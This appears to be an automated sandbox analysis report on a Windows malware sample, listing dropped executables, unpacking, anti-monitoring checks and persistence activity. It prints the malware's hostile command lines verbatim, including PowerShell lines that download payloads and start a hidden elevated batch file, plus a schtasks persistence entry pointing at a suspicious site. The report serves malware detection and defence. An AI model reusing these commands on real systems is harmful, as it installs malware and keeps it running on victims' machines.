Source:	Binary string: wextract.pdb source: Installer.exe, 0000000D.00000002.2552418569.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp, Installer.exe, 0000000D.00000000.2198725612.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: Installer.exe, 0000000D.00000002.2552418569.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp, Installer.exe, 0000000D.00000000.2198725612.00007FF6ACAF9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: BitLockerToGo.pdb source: taskweaker.exe, 00000024.00000003.2493780033.00000231C7730000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2508846251.000000C0001FE000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000003.2493835629.00000231C76F0000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2510607407.000000C000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4489596109.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4500436480.0000000005322000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4500436480.0000000005327000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 00000007.00000002.4492467158.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: taskweaker.exe, 00000024.00000003.2493780033.00000231C7730000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2508846251.000000C0001FE000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000003.2493835629.00000231C76F0000.00000004.00001000.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2510607407.000000C000400000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Unpacked PE file: 0.2.hsRju5CPK2.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 2.2.axplong.exe.cf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 3.2.axplong.exe.cf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vlmgqsmh:EW;nzwzyaet:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"

Source: Installer[1].exe.2.dr

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000FBEA9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_000FBEA9

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: reakuqnanrkn.exe.30.dr	Static PE information: real checksum: 0x0 should be: 0x29722a
Source: 8.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x5b862
Source: gold.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x8e748
Source: lummac2.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x573fc
Source: lummac2[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x573fc
Source: 1[1].exe.11.dr	Static PE information: real checksum: 0x45ea8 should be: 0x332d9
Source: gold[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x8e748
Source: ama[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4d248
Source: FirstZ.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x29722a
Source: 1.exe.11.dr	Static PE information: real checksum: 0x45ea8 should be: 0x332d9
Source: hsRju5CPK2.exe	Static PE information: real checksum: 0x1d857f should be: 0x1dfbb3
Source: legs[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0xa534b
Source: legs.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0xa534b
Source: NewLatest[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x755f6
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d857f should be: 0x1dfbb3
Source: FirstZ[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x29722a
Source: ama.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4d248
Source: Hkbsse.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x755f6
Source: NewLatest.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x755f6

Source: hsRju5CPK2.exe	Static PE information: section name:
Source: hsRju5CPK2.exe	Static PE information: section name: .idata
Source: hsRju5CPK2.exe	Static PE information: section name:
Source: hsRju5CPK2.exe	Static PE information: section name: vlmgqsmh
Source: hsRju5CPK2.exe	Static PE information: section name: nzwzyaet
Source: hsRju5CPK2.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: vlmgqsmh
Source: axplong.exe.0.dr	Static PE information: section name: nzwzyaet
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: taskweaker[1].exe.2.dr	Static PE information: section name: .xdata
Source: taskweaker.exe.2.dr	Static PE information: section name: .xdata
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&
Source: FirstZ[1].exe.11.dr	Static PE information: section name: .00cfg
Source: FirstZ.exe.11.dr	Static PE information: section name: .00cfg
Source: reakuqnanrkn.exe.30.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D0D82C push ecx; ret	2_2_00D0D83F
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025BC0A0 push cs; iretd	4_2_025BC0AE
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025BC1E1 push cs; iretd	4_2_025BC1EE
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025BA858 push ecx; iretd	4_2_025BA867
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025BB548 pushfd ; iretd	4_2_025BB79E
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025B983A push eax; iretd	4_2_025B983B
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_0691502B push 88068FCCh; ret	4_2_06915035
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06914908 push 94068FC6h; ret	4_2_06914915
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_077751BF push es; iretd	4_2_077751CC
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009EA04A push ecx; ret	5_2_009EA05D
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009ECDB0 push edx; ret	5_2_009ECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0500EAC2 pushad ; retf	7_2_0500EAC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0500DBC0 pushad ; ret	7_2_0500DBC1
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005DBF1A push FFFFFFAAh; iretd	8_2_005DBEB3
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000E1314 push ecx; retn 0000h	9_2_000E1315
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000E064F push ss; iretd	9_2_000E0650
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000ED82C push ecx; ret	9_2_000ED83F
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000EDED6 push ecx; ret	9_2_000EDEE9
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BAD82C push ecx; ret	11_2_00BAD83F
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BADED6 push ecx; ret	11_2_00BADEE9

Source: hsRju5CPK2.exe	Static PE information: section name: entropy: 7.983634798638748
Source: hsRju5CPK2.exe	Static PE information: section name: vlmgqsmh entropy: 7.955889374126679
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.983634798638748
Source: axplong.exe.0.dr	Static PE information: section name: vlmgqsmh entropy: 7.955889374126679
Source: 1[1].exe.11.dr	Static PE information: section name: .text entropy: 7.6678916806122706
Source: 1.exe.11.dr	Static PE information: section name: .text entropy: 7.6678916806122706

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	File created: C:\ProgramData\wikombernizc\reakuqnanrkn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Installer[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File created: C:\Users\user\AppData\Local\Temp\8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Temp\1000014001\1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File created: C:\Users\user\AppData\Local\Temp\6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	File created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe

File created: C:\ProgramData\wikombernizc\reakuqnanrkn.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000EC66B GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_000EC66B

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
